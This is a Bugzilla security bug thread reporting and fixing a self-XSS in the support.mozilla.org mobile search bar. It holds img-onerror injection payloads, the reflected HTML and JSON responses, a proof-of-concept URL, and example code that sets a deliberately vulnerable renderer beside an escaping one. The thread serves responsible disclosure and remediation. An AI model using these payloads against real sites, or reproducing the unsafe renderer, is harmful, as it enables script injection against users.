Closed
Bug 1238252
Opened 8 years ago
Closed 8 years ago
Self-XSS in support.mozilla.org Mobile Site's Main Search Bar
Categories
(support.mozilla.org :: General, defect)
support.mozilla.org
General
Tracking
(Not tracked)
VERIFIED
FIXED
People
(Reporter: justashar, Assigned: mythmon)
References
Details
(Keywords: sec-low, wsec-selfxss)
Attachments
(1 file)
148.31 KB,
image/jpeg
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36

Steps to reproduce:
Hi, I found an XSS in support.mozilla.org Mobile Site's Main Search Bar. Open the following URL in any browser:
https://support.mozilla.org/en-US/questions/new/desktop/download-and-install/form?&mobile=1
The site provides a search facility. Inject the following XSS payload in the search bar and hit enter.
'"><img src=x onerror=prompt(document.domain);>

Actual results:
The site executes JavaScript code. The screenshot is also attached.

Expected results:
There is no output encoding at this time.
Comment 1•8 years ago
Ashar - Thank you for filing this bug regarding the support search functionality. I have been able to replicate the behavior you suggested and will be performing some additional testing to understand its exploitability for our users. I will add any additional details I find to this bug.
Comment 2•8 years ago
Safe injection: '"><img src=x onerror=alert('xss');>

Resulting HTML response containing multiple copies of the original injection without output encoding:

</div><div class="results wrapper slide-on-exposed" id="instant-search-content">
<ol class="search-results">
<li class="document"> <a href="/en-US/kb/email-notifications-and-inbox-sync?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">Email notifications and inbox sync</span> Never miss an email again! Here's how to set notifications and sync preferences on your Firefox OS device. </a> </li>
<li class="document"> <a href="/en-US/kb/x-ray-goggles?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">What is X-Ray Goggles</span> <b>X</b>-Ray Goggles allow you to see the building blocks that make up websites on the internet, and then remix them into new creations. </a> </li>
<li class="document"> <a href="/en-US/kb/how-customize-new-mail-sound?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">How to Customize the New Mail Sound</span> A how-to article on customizing the sound that plays when a new email message is downloaded. </a> </li>
<li class="document"> <a href="/en-US/kb/firefox-no-longer-works-mac-os-x-10-5?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">Firefox no longer works with Mac OS X 10.5</span> Firefox 16 is the last version of Firefox that works on Mac OS <b>X</b> 10.5 (Leopard). To stay safe online, we recommend upgrading your computer or operating system. </a> </li>
<li class="document"> <a href="/en-US/kb/install-x-ray-goggles?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">How to Install X-Ray Goggles</span> Installing <b>X</b>-Ray Goggles is easy. You can then poke around on any web page and transform it into your own creation! Here's how. </a> </li>
<li class="document"> <a href="/en-US/kb/firefox-no-longer-works-mac-os-10-4-or-powerpc?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">Firefox no longer works with Mac OS X 10.4 or PowerPC processors</span> Firefox 3.6.28 is the last Firefox version to work on Mac OS <b>X</b> 10.4 or on Mac OS <b>X</b> 10.5 with a PowerPC Mac. Switch to a newer computer to stay safe online. </a> </li>
<li class="document"> <a href="/en-US/kb/scrolling-issue-firefox-os-x-mavericks?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">Scrolling issue on Firefox after upgrading to OS X Mavericks</span> This article shows you how to address scrolling issue caused by upgrading to OS <b>X</b> Mavericks. </a> </li>
<li class="document"> <a href="/en-US/kb/ringer-sound-and-vibrate-settings?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">Ringer, sound and vibrate settings</span> Learn how to change your <b>alerts</b> or ringtones, add songs as ringtones, or turn your phone on vibrate or silent mode. </a> </li>
<li class="document"> <a href="/en-US/kb/inspecting-and-remixing-your-first-web-page?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">Inspecting and remixing your first web page</span> <b>X</b>-Ray Goggles lets you poke around the elements of a web page and remix them into new creations. Learn how to swap images, text, and more. </a> </li>
<li class="document"> <a href="/en-US/kb/am-i-really-hacking?&s='"><img src="x" onerror="alert('xss');"> &as=s&__keywords=true"> <span class="title">Am I really hacking a web page?</span> Understand the difference between hacking with <b>X</b>-Ray Goggles, where you fork a copy of a webpage, versus the general term "hacking" where you break into a page. </a> </li>
</ol> </div>
Reporter
Comment 3•8 years ago
Yes. The reflection of the injection in the DOM appears many times and there is no output encoding ...
Updated•8 years ago
Summary: XSS in support.mozilla.org Mobile Site's Main Search Bar → DOM-based XSS in support.mozilla.org Mobile Site's Main Search Bar
Comment 4•8 years ago
Ashar - Although I agree there is a lack of output encoding here, which should be fixed, I cannot see a reasonable mechanism for an attacker to leverage such a payload in a practical manner. It seems the only reasonable exploitation vector would be for a user to be tricked into typing a malicious payload into the search bar, rather than clicking a malicious link in, say, a phishing scam. Do you agree? If not, could you explain and perhaps provide an example case that would suggest further impact? Again, many thanks for this submission!
Comment 5•8 years ago
In other words, I'm suggesting that the exploitation vector is limited to Self-XSS (https://en.wikipedia.org/wiki/Self-XSS), but would like your feedback to make sure we're in sync with our understanding.
Reporter
Comment 6•8 years ago
You're right. It is Self-XSS but I hope it will be fixed.
Updated•8 years ago
Comment 8•8 years ago
HTTP Request:

GET /en-US/search?format=json&undefined=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%27xss%27)%3B%3E+&q=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%27xss%27)%3B%3E+ HTTP/1.1
Host: support.mozilla.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://support.mozilla.org/en-US/questions/new/desktop/download-and-install/form?&mobile=1
***REDACTED_SESSION_DATA***
X-Requested-With: XMLHttpRequest
Connection: close

HTTP Response:

HTTP/1.1 200 OK
Server: Apache
Vary: X-Mobile,User-Agent
X-Backend-Server: support2.webapp.phx1.mozilla.com
Cache-Control: no-cache, must-revalidate
Content-Type: application/json
Strict-Transport-Security: max-age=31536000
Public-Key-Pins: max-age=1296000; pin-sha256="r/mIkG3eEpVdm+u/ko/cwxzOMo1bk4TyHIlByibiA5E="; pin-sha256="WoiWRyIOVNa9ihaBciRSC7XHjliYS9VwUGOIud4PB18=";
Date: Mon, 11 Jan 2016 15:55:39 GMT
Keep-Alive: timeout=5, max=864
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-XSS-Protection: 1; mode=block
Pragma: no-cache
X-Content-Type-Options: nosniff
Connection: close
X-Robots-Tag: noodp
X-Frame-Options: DENY
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 4288

{"q":"'\"><img src=x onerror=alert('xss');> ","fallback_results":null,"pagination":{"has_next":true,"span":4,"url":"https://support.mozilla.org/en-US/search?q=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27xss%27%29%3B%3E+&undefined=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27xss%27%29%3B%3E+&format=json","max":10,"number":1,"page_range":[1,2,3,4,5,6,7,8],"has_previous":false,"dotted_upper":true,"num_pages":47,"dotted_lower":false},"total":10,"num_results":467,"w":1,"products":[{"slug":"firefox","title":"Firefox"},{"slug":"mobile","title":"Firefox for Android"},{"slug":"ios","title":"Firefox for iOS"},{"slug":"firefox-os","title":"Firefox OS"},{"slug":"focus-firefox","title":"Focus by Firefox"},{"slug":"thunderbird","title":"Thunderbird"},{"slug":"webmaker","title":"Webmaker"}],"product_titles":"All Products","results":[{"search_summary":"Never miss an email again! Here's how to set notifications and sync preferences on your Firefox OS device.","title":"Email notifications and inbox sync","url":"/en-US/kb/email-notifications-and-inbox-sync","explanation":"","rank":1,"score":0.027203325,"type":"document","id":19233},{"search_summary":"<b>X</b>-Ray Goggles allow you to see the building blocks that make up websites on the internet, and then remix them into new creations.","title":"What is X-Ray Goggles","url":"/en-US/kb/x-ray-goggles","explanation":"","rank":2,"score":0.010656366,"type":"document","id":14438},{"search_summary":"Firefox 16 is the last version of Firefox that works on Mac OS <b>X</b> 10.5 (Leopard). To stay safe online, we recommend upgrading your computer or operating system.","title":"Firefox no longer works with Mac OS X 10.5","url":"/en-US/kb/firefox-no-longer-works-mac-os-x-10-5","explanation":"","rank":3,"score":0.009599386,"type":"document","id":11507},{"search_summary":"Installing <b>X</b>-Ray Goggles is easy. You can then poke around on any web page and transform it into your own creation! Here's how.","title":"How to Install X-Ray Goggles","url":"/en-US/kb/install-x-ray-goggles","explanation":"","rank":4,"score":0.009551151,"type":"document","id":14865},{"search_summary":"A how-to article on customizing the sound that plays when a new email message is downloaded.","title":"How to Customize the New Mail Sound","url":"/en-US/kb/how-customize-new-mail-sound","explanation":"","rank":5,"score":0.009239691,"type":"document","id":17203},{"search_summary":"Firefox 3.6.28 is the last Firefox version to work on Mac OS <b>X</b> 10.4 or on Mac OS <b>X</b> 10.5 with a PowerPC Mac. Switch to a newer computer to stay safe online.","title":"Firefox no longer works with Mac OS X 10.4 or PowerPC processors","url":"/en-US/kb/firefox-no-longer-works-mac-os-10-4-or-powerpc","explanation":"","rank":6,"score":0.008637331,"type":"document","id":9263},{"search_summary":"This article shows you how to address scrolling issue caused by upgrading to OS <b>X</b> Mavericks.","title":"Scrolling issue on Firefox after upgrading to OS X Mavericks","url":"/en-US/kb/scrolling-issue-firefox-os-x-mavericks","explanation":"","rank":7,"score":0.0076004304,"type":"document","id":20117},{"search_summary":"Learn how to change your <b>alerts</b> or ringtones, add songs as ringtones, or turn your phone on vibrate or silent mode.","title":"Ringer, sound and vibrate settings","url":"/en-US/kb/ringer-sound-and-vibrate-settings","explanation":"","rank":8,"score":0.0020853204,"type":"document","id":13218},{"search_summary":"<b>X</b>-Ray Goggles lets you poke around the elements of a web page and remix them into new creations. Learn how to swap images, text, and more.","title":"Inspecting and remixing your first web page","url":"/en-US/kb/inspecting-and-remixing-your-first-web-page","explanation":"","rank":9,"score":0.00095560943,"type":"document","id":14439},{"search_summary":"On Mac OS <b>X</b> 10.9.5 or higher, Apple shows a security warning for apps that are not installed through the App Store. Follow these steps if you see the warning while trying to open a Firefox Marketplace app.","title":"How do I change my Mac Security Settings so I can open Firefox Marketplace apps?","url":"/en-US/kb/mac-security-settings-firefox-marketplace","explanation":"","rank":10,"score":0.00094013184,"type":"document","id":24236}],"lang_name":"English"}
Comment 9•8 years ago
The request/response provided above demonstrates that the request generated by the mobile search bar produces a JSON-typed response, which contains the reflected values that were injected. This, I suspect, is then interpreted by the application, resulting in the self-XSS. If an attacker attempted to weaponize this via a GET URL, it should just result in a JSON response in the browser. Here's an example GET-based PoC that demonstrates this: https://support.mozilla.org/en-US/search?format=json&undefined=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27xss%27%29%3B%3E+&q=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27xss%27%29%3B%3E+ The browser would attempt to parse the JSON and would fail to validate.
Reporter
Comment 10•8 years ago
The resulting response page has been served with a proper content type, i.e., Content-Type: application/json, and that's why XSS will not work as far as modern browsers are concerned. The only option left is Self-XSS.
Comment 11•8 years ago
mythmon: Can you have a look at this? Looks like we could improve some of the output encoding for the mobile components of search in support.mozilla.org and address this.
Flags: needinfo?(mcooper)
Assignee
Comment 12•8 years ago
Jonathan: At first glance, this seems to be a similar issue to bug 1223970. Like in that bug, the search API should not HTML encode the results because those results may be consumed in other contexts. Instead the JS running on the page should be responsible for escaping the content. It should be an easy fix for us to avoid the self-XSS.
Flags: needinfo?(mcooper)
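Comment 12 puts the encoding responsibility on the page script rather than the search API. The following is an added example written for this page, not kitsune's own code: a concatenating renderer that reproduces the unencoded href seen in comment 2, beside one that URL-encodes the query and then HTML-escapes the attribute and text, run over a constructed response shaped like the JSON in comment 8.

```javascript
// Added example, not kitsune's code: rendering the search API's JSON into
// the instant-search list. The API returns the raw query in "q"; the page
// script must encode it for each context it lands in (URL parameter inside
// an href attribute, then the attribute/text HTML context).

// Constructed sample shaped like the JSON response in comment 8.
const SAMPLE_RESPONSE = {
  q: "'\"><img src=x onerror=alert('xss');> ",
  results: [
    { title: "Email notifications and inbox sync",
      url: "/en-US/kb/email-notifications-and-inbox-sync",
      search_summary: "Never miss an email again!" },
  ],
};

// Vulnerable renderer: plain concatenation, so the query lands in the href
// unencoded and the "> in the payload closes the attribute and the tag.
// This reproduces the behaviour the thread describes; do not use it.
function renderUnsafe(resp) {
  return resp.results.map(r =>
    `<li class="document"><a href="${r.url}?&s=${resp.q}&as=s&__keywords=true">` +
    `<span class="title">${r.title}</span> ${r.search_summary}</a></li>`).join("");
}

// Escaper for HTML text and double-quoted attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c]));
}

// Hardened renderer: encodeURIComponent for the URL context, escapeHtml for
// the HTML context. The real API's <b> hit-highlighting in search_summary is
// treated as text here; keeping it would need an allowlist sanitizer instead.
function renderSafe(resp) {
  return resp.results.map(r => {
    const href = `${r.url}?&s=${encodeURIComponent(resp.q)}&as=s&__keywords=true`;
    return `<li class="document"><a href="${escapeHtml(href)}">` +
      `<span class="title">${escapeHtml(r.title)}</span> ` +
      `${escapeHtml(r.search_summary)}</a></li>`;
  }).join("");
}

// True when the markup contains a start or end tag other than the ones the
// template itself emits (li, a, span), i.e. something leaked through.
function hasInjectedTag(html) {
  return /<(?!\/?(li|a|span)\b)[a-z]/i.test(html);
}
```

The same check applies to any other place the page script copies fields from the JSON into markup; the API response itself stays unencoded so other consumers get the raw values.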
Comment 13•8 years ago
mythmon: that's great, thanks! I agree that JS running on the page should be safely handling the JSON content.
Comment 14•8 years ago
This bug is alluded to in this blog post by Ashar: https://respectxss.blogspot.de/2016/01/persistent-xss-in-mozilla-add-ons-site.html
Reporter
Comment 15•8 years ago
Without mentioning the details (where and how), I only mentioned the bug. Is there something wrong?
Assignee
Comment 16•8 years ago
PR with a fix here (unmerged, and undeployed): https://github.com/mozilla/kitsune/pull/2771
Comment 17•8 years ago
Is it going to be fixed?
Comment 18•8 years ago
Ashar - No, there is nothing wrong. It's our preference that we not share anything about a security bug until it's fixed and published. I was linking your blog post above for context so those working this bug are aware of its presence. Lnazi - Yes, it sounds like it's going to be fixed. See above for mythmon's PR, which is pending review.
Comment 19•8 years ago
Jonathan - Great :). The mobile version of Mozilla.org needs to be fixed because I stumbled upon a few more vulnerabilities, which I will post soon.
Comment 21•8 years ago
:( Mine is a duplicate?
Comment 22•8 years ago
Lnazi - yes, #1238547 is a duplicate, meaning that both submissions target the same code deficiency in the same way (despite variations in the XSS payload).
Comment 23•8 years ago
What are the requirements for bounties or the HoF?
Comment 24•8 years ago
Is there any chance for my bugs?
Comment 25•8 years ago
Lnazi - Please see this page for sites and bug types that would be eligible for bounties => https://www.mozilla.org/en-US/security/bug-bounty/faq-webapp/#eligible-bugs
Comment 26•8 years ago
Mine is XSS (DOM-based), so do you think there is any chance of a bounty? And when will the security team take action on it?
Comment 27•8 years ago
Lnazi - You are not likely to receive a bounty for #1238547 because Ashar reported this issue first in #1238252.
Updated•8 years ago
Status: UNCONFIRMED → NEW
Ever confirmed: true
Updated•8 years ago
Assignee: nobody → rdalal
Status: NEW → ASSIGNED
Assignee
Updated•8 years ago
Assignee: rdalal → mcooper
Assignee
Comment 28•8 years ago
The fix for this has been pushed to production.
Status: ASSIGNED → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Reporter
Comment 29•8 years ago
Good. I checked and it is fixed now.
Assignee
Updated•8 years ago
Status: RESOLVED → VERIFIED
Updated•8 years ago
Flags: sec-bounty?
Comment 30•8 years ago
This is a self-XSS and rated sec-low as a result. This is not eligible for a bug bounty.
Flags: sec-bounty? → sec-bounty-
Updated•8 years ago
Group: websites-security
Updated•8 years ago
Keywords: wsec-xss → wsec-selfxss